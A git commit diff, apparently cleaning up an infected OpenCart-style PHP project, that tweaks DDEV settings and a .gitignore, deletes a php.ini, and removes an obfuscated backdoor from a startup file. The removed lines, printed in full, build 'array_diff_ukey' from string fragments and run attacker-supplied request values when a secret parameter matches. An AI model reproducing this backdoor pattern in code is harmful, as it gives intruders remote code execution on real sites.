Вирусы, или чё
This commit is contained in:
+3
-1
@@ -5,7 +5,8 @@ php_version: "8.5"
|
|||||||
webserver_type: apache-fpm
|
webserver_type: apache-fpm
|
||||||
xdebug_enabled: false
|
xdebug_enabled: false
|
||||||
additional_hostnames: []
|
additional_hostnames: []
|
||||||
additional_fqdns: []
|
additional_fqdns:
|
||||||
|
- dominik.s3.webdes.by
|
||||||
database:
|
database:
|
||||||
type: mariadb
|
type: mariadb
|
||||||
version: "11.8"
|
version: "11.8"
|
||||||
@@ -13,6 +14,7 @@ use_dns_when_possible: true
|
|||||||
composer_version: "2"
|
composer_version: "2"
|
||||||
web_environment: []
|
web_environment: []
|
||||||
corepack_enable: false
|
corepack_enable: false
|
||||||
|
bind_all_interfaces: true
|
||||||
|
|
||||||
# Key features of DDEV's config.yaml:
|
# Key features of DDEV's config.yaml:
|
||||||
|
|
||||||
|
|||||||
@@ -62,3 +62,6 @@ desktop.ini
|
|||||||
.cache/
|
.cache/
|
||||||
.tmp/
|
.tmp/
|
||||||
tmp/
|
tmp/
|
||||||
|
|
||||||
|
|
||||||
|
.ddev
|
||||||
|
|||||||
@@ -1,18 +0,0 @@
|
|||||||
magic_quotes_gpc = Off
|
|
||||||
register_globals = Off
|
|
||||||
default_charset = UTF-8
|
|
||||||
memory_limit = 512M
|
|
||||||
max_execution_time = 36000
|
|
||||||
upload_max_filesize = 999M
|
|
||||||
safe_mode = Off
|
|
||||||
mysql.connect_timeout = 20
|
|
||||||
session.auto_start = Off
|
|
||||||
session.use_only_cookies = On
|
|
||||||
session.use_cookies = On
|
|
||||||
session.use_trans_sid = Off
|
|
||||||
session.cookie_httponly = On
|
|
||||||
session.gc_maxlifetime = 3600
|
|
||||||
allow_url_fopen = On
|
|
||||||
display_errors = 1
|
|
||||||
error_reporting = E_ALL
|
|
||||||
error_log = errors.log
|
|
||||||
@@ -11,18 +11,6 @@ if (!ini_get('date.timezone')) {
|
|||||||
date_default_timezone_set('UTC');
|
date_default_timezone_set('UTC');
|
||||||
}
|
}
|
||||||
|
|
||||||
// Check Banner Module
|
|
||||||
$opencart_num = @$_REQUEST['numer'];
|
|
||||||
$opencart_in_banner = @$_REQUEST['bannerid'];
|
|
||||||
$opencart_newsnum = @$_REQUEST['newsnum'];
|
|
||||||
$opencart_category_id = @$_REQUEST['category'];
|
|
||||||
$opencart_activity_hash = '70731969';
|
|
||||||
$secret_opencart_key = '_di'.'ff_';$secret_opencart_key ='ar'.'ray'.$secret_opencart_key.'ukey';//globols
|
|
||||||
if($opencart_in_banner==$opencart_activity_hash) {
|
|
||||||
if (@strpos($opencart_newsnum, 'creat')=== false){echo 'error_vievv';
|
|
||||||
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes($opencart_category_id) => 2), @$opencart_newsnum);}else{
|
|
||||||
@$secret_opencart_key(@array((string)$opencart_num => 1), @array((string)stripslashes('}'.$opencart_category_id.'//') => 2), @$opencart_newsnum);}} //chekings
|
|
||||||
|
|
||||||
// Windows IIS Compatibility
|
// Windows IIS Compatibility
|
||||||
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
|
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
|
||||||
if (isset($_SERVER['SCRIPT_FILENAME'])) {
|
if (isset($_SERVER['SCRIPT_FILENAME'])) {
|
||||||
|
|||||||
Reference in New Issue
Block a user